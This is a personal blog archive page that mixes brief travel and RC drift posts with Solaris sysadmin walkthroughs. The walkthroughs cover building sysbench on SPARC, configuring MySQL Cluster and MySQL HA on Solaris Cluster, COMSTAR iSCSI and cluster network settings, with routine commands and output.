Archive for the 'Aktifitas' Category






Lost in Surabaya *again

  ozzie / 02/01/2014

Surabaya, 27 Dec 2013 – 2 Jan 2014



Lost in Balikpapan

  ozzie / 16/12/2013

Balikpapan



RCDI Final 2013

  ozzie / 08/12/2013


Seasons City Mall – 8 Dec 2013



Sarinah Never Sleeps 2013

  ozzie / 07/12/2013

RC Drift Fun Race Magelang

  ozzie / 13/11/2013





Bekasi, Semarang, Magelang, Cirebon; 8 – 11 November 2013



Drifting again…

  ozzie / 21/10/2013

new experience

  ozzie / 14/10/2013


MGK Kemayoran, 13 Oct 2013



RC Drift

  ozzie / 11/10/2013

Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

A bit of documentation, given how many SYSBENCH installs fail on Solaris, especially on the SPARC architecture :D

The basic recipe:

 
1. make sure Solaris Studio is ready

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update PATH for the newly installed binaries

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install

 
6. extract, build & install sysbench
edit configure.ac

# cd sysbench-0.4.12
# vi configure.ac



change AC_PROG_LIBTOOL to AC_PROG_RANLIB:

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



to:

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB
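If you rebuild often, the edit can be scripted. A minimal sketch (run against a demo copy here; in practice point it at sysbench's configure.ac, and note that Solaris /usr/bin/sed has no -i flag):

```shell
# Simulate the relevant lines of configure.ac in a demo file:
printf 'AC_PROG_CC\nAC_PROG_LIBTOOL\n' > configure.ac.demo

# Swap AC_PROG_LIBTOOL for AC_PROG_RANLIB; write to a temp file,
# then move it back (portable replacement for GNU sed -i):
sed 's/^AC_PROG_LIBTOOL$/AC_PROG_RANLIB/' configure.ac.demo > configure.ac.new
mv configure.ac.new configure.ac.demo

cat configure.ac.demo
```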


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
Now let's benchmark MySQL Enterprise OLTP. <:-p <:-p
How did it turn out?? :>
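For reference, an OLTP run with the 0.4-series command line could look roughly like this (a sketch: socket path, credentials, table size and thread count are assumptions, and the legacy --test=oltp mode is specific to sysbench 0.4.x):

```
# /opt/sysbench/bin/sysbench --test=oltp --mysql-socket=/tmp/mysql.sock \
    --mysql-user=root --mysql-password=... --oltp-table-size=1000000 prepare
# /opt/sysbench/bin/sysbench --test=oltp --mysql-socket=/tmp/mysql.sock \
    --mysql-user=root --mysql-password=... --num-threads=16 --max-time=60 \
    --max-requests=0 run
```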



RC Drift

  ozzie / 11/09/2013

Play & learn.. so as not to become cowardly TRASH adding to Jakarta's traffic jams



Safety can be Fun

  ozzie / 06/09/2013

Nyasar Surabaya

  ozzie / 05/09/2013

[Surabaya] wandering around, lost, at Hotel Majapahit (formerly Hotel Yamato / Hotel Oranje)
http://id.wikipedia.org/wiki/Insiden_Hotel_Yamato



Make Work into Play – Make Play into Work

Jatiluhur, Purwakarta



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: NDB, SQL, Management
node2 [10.0.5.42]: NDB, SQL
node3 [10.0.5.43]: NDB, SQL


Since this is only a development setup, the config & datadir directory structure lives under /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini --configdir=/apps/config/ --initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

Execute @ node1: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

Execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

Check from the cluster management client:

# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
ndb_mgm>

Execute on all nodes:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
All that's left is to configure privileges & create a database with the ndbcluster engine
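For example (a sketch; the database and table names are made up): a table becomes clustered simply by choosing the ndbcluster engine. One caveat from the MySQL Cluster manual: the database itself has to be created on every SQL node, while the NDB tables inside it are then shared automatically.

```
mysql> CREATE DATABASE clusterdb;          -- repeat on each SQL node
mysql> CREATE TABLE clusterdb.t1 (
    ->   id INT NOT NULL PRIMARY KEY,
    ->   note VARCHAR(32)
    -> ) ENGINE=NDBCLUSTER;
mysql> INSERT INTO clusterdb.t1 VALUES (1, 'written on node1');
```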



Removing a Node From a Resource Group
How to throw a node (monyet3) out of an active resource group..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrs status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2
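As with the nodelist, the change can be verified with the same grep; it should now report only sc_ipmp0@1 and sc_ipmp0@2:

```
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
```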

From the currently active node:

# clnode evacuate monyet3

Shut down monyet3 and boot it in non-cluster mode:

ok boot -x

to be continued….



Solaris COMSTAR – iSCSI

  ozzie / 02/07/2013
# pkg install group/feature/storage-server
           Packages to install:  47
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   3
 
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk0
Logical unit created: 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk1
Logical unit created: 600144F000144FFB295351DFFBB80002
 
 
 
root@iSCSI-ZFS1:~# stmfadm list-lu -v
LU Name: 600144F000144FFB295351DFFBB20001
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk0
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk0
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
LU Name: 600144F000144FFB295351DFFBB80002
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk1
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk1
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
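At this point the LUs exist but no initiator can see them (View Entry Count is still 0). The usual next steps, as a hedged sketch, are to enable the iSCSI target service, create a target, and map the LUs into a view:

```
root@iSCSI-ZFS1:~# svcadm enable -r svc:/network/iscsi/target:default
root@iSCSI-ZFS1:~# itadm create-target
root@iSCSI-ZFS1:~# stmfadm add-view 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm add-view 600144F000144FFB295351DFFBB80002
```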


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

Building MySQL HA Enterprise on the kandang-monyet & kandang-buaya Solaris Clusters…
Since a MySQL Data Service is not yet included in Solaris Cluster.. it has to be registered manually..

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

Register the Generic Data Service:

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create the resource group and logical hostname for failover:

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG
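The new group can then be managed and brought online on its primary node (a sketch):

```
# clresourcegroup online -M MySQL-RG
# clresourcegroup status MySQL-RG
```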

Manual registration:
set the parameters to match the configuration & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

register Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

Now just switch between the nodes #:-s
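Switching is a single command; a sketch of failing the group over to buaya1 and checking the result:

```
# clresourcegroup switch -n buaya1 MySQL-RG
# clrs status
```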

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shut down all the nodes.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Since these are SPARC machines, just add the option at the OK prompt..

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

Then run clsetup:

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

Just reboot, and tadaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

A High-Availability Storage simulation: a 3-node Solaris Cluster with iSCSI, on Solaris 11 & Solaris Cluster 4.1.
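On each cluster node, the shared iSCSI LUs (served by the COMSTAR box from the earlier post) are attached roughly like this; the discovery address below is a placeholder:

```
# iscsiadm add discovery-address 10.0.5.50:3260
# iscsiadm modify discovery --sendtargets enable
# devfsadm -i iscsi
# cldevice populate
```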


Once the Solaris Cluster is up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add a quorum disk device:

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk paths fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Register the cluster storage (SUNW.HAStoragePlus) and generic data service (SUNW.gds) resource types:

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create a resource group spanning the Monyet nodes:

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
